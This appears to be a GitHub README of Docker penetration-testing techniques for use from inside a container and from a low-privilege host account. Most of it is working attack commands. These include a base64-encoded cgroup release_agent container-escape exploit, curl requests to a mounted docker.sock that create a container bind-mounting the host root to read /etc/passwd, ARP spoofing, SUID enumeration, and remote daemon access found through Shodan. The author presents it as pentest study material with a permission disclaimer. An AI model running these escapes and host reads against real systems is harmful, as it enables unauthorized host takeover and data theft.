This repository assumes that you have basic knowledege about Docker. This repo's main focus is on collecting the ways to attack Docker Enviroment in one place.
For Pentesting application running inside Docker, we need to break it down into two way.
1 - When we are INSIDE the Container
2 - When we are OUTSIDE the Container with less privileges (Specifically, on Host)
Assuming we got a Shell on the server by exploiting RCE vulnerability or SSH, or any means.
ls /.dockerenv
Otherways if this is not possible:
- List all the directories of Cgroup, as this contains the Container ID, so we will know.
grep '/docker/' /proc/1/cgroup
- Retrieve all the Environment Variables
env
-
Find the IP address, always check for Network Adaptors. If the container container two different IP, we can extend our attack surface.
ifconfig -
Use NMAP to scan the entire Network
nmap -
Take an example:-
-- If some other container runs postgreSQL database, you can easily discover by scanning the network of container, then you can access it and check for misconfigurations, default credentials. Not only this, but alot of other things you can find and check.
We can arpspoof the traffic, and get delayed in the network requests.
-
This command requires SYS_ADMIN flag, which --privileged flag contains it.
ip link add dummy0 type dummy -
Incase
ipcommand is not found
apt update && apt install iproute2
This below exploit was created by Felix Wilhelm
-
This command decodes the below base64 string and output the results to 'expoit.sh' file.
echo ZD1gZGlybmFtZSAkKGxzIC14IC9zKi9mcy9jKi8qL3IqIHxoZWFkIC1uMSlgCm1rZGlyIC1wICRkL3c7ZWNobyAxID4kZC93L25vdGlmeV9vbl9yZWxlYXNlCnQ9YHNlZCAtbiAncy8uKlxwZXJkaXI9XChbXixdKlwpLiovXDEvcCcgL2V0Yy9tdGFiYAp0b3VjaCAvbzsgZWNobyAkdC9jID4kZC9yZWxlYXNlX2FnZW50O2VjaG8gIiMhL2Jpbi9zaAokMSA+JHQvbyIgPi9jO2NobW9kICt4IC9jO3NoIC1jICJlY2hvIDAgPiRkL3cvY2dyb3VwLnByb2NzIjtzbGVlcCAxO2NhdCAvbw== | base64 -d > exploit.sh -
Below command will retrive the process running inside the Host, Hence Container Escaped. This exploit was uses cgroup's notification_on_release feature. So when you decode this base64 string, you will get a list of commands that the admin of this exploit uses, he also mentions that this is not a bug, but a feature. The best way to use this exploit is by using base64 encodeed string, as above.
sh exploit.sh ps
- This will retrieves the containers running by requesting to the docker daemon, as docker.sock is mounted on Container from Host as can easily access it.
curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
-
Run this command inside the container, this command will create a new container which we named
escapingwhich mounts the host's root directory i.e/inside the new container at/hostpath and then we setCmddirective to read the host's/etc/passwdfile which we can access inside the container at/host/etc/passwd.
curl -X POST -H "Content-Type: application/json" --unix-socket /run/docker.sock -d '{"Image":"ubuntu:latest", "Cmd":["cat", "/host/etc/passwd"], "Mounts":[{"Type":"bind", "Source":"/", "Target":"/host"}]}' "http://localhost/containers/create?name=escaping" -
Start the new container (escaping is the container name we created).
curl -X POST --unix-socket /run/docker.sock "http://localhost/containers/escaping/start" -
Now we can read the file contents by reading the logs of the new container.
curl --output - --unix-socket /run/docker.sock "http://localhost/containers/escaping/logs?stdout=true"
Assuming we have got a shell but the user is having less privileges.
-
Check what users have access to docker group. In other words, what users can run
dockercommand, so that if our user is mention in the docker group we can start a container, mount the directories, and can access the file system.
grep docker /etc/group -
Check if the docker SUID bit is set or not. This command will list each and every file which contains SUID bit set, now we can check if docker is available or not. If it is available we can run docker with root permissions.
find / -perm -u=s -type f 2>/dev/null -
Check who can access docker socket daemon. If our user have access to this docker, we can use API to create, run the container and get access to the root data.
ls -l /var/run/docker.sock
So now, we can access docker? Below both commands are to list out the images/containers so that we can read the Environment variables if any.
-
List all the docker containers
docker ps -
List all the docker images
docker images -
We can read the config of either a Container or Image, by its name, that's why we first list out all the Containers/Images.
docker inspect <Container id/name or Repository Name> -
Check if any docker compose file is there. This command will find the file by its name.
find / -name "docker-compose.*" -
Check if any vulnerable version of docker is running, we can go for public CVE exploits.
docker --version
-
Shodan query
product:docker -
Connect with docker daemon remotely and listing out the containers
docker -H ip:port psordocker -H ip:port ps -a
Now we can execute the containers, and do lot of fun. (But please don't execute in this way, you should have permission from the organization, if you do, No One is Responsible).
I would like to know more ways to exploit the app/environment running inside docker so if you have any suggestion to add, please let me know. Also please let me know if you found any mistakes in this repo, as I am not an expert but I am just trying to learn.
- https://i.blackhat.com/us-18/Thu-August-9/us-18-McGrew-An-Attacker-Looks-At-Docker-Approaching-Multi-Container-Applications-wp.pdf
- https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1
- https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
- https://twitter.com/_fel1x/status/1151487053370187776
- https://www.cs.ru.nl/bachelors-theses/2020/Joren_Vrancken___4593847___A_Methodology_for_Penetration_Testing_Docker_Systems.pdf
- https://docs.docker.com/engine/install/linux-postinstall/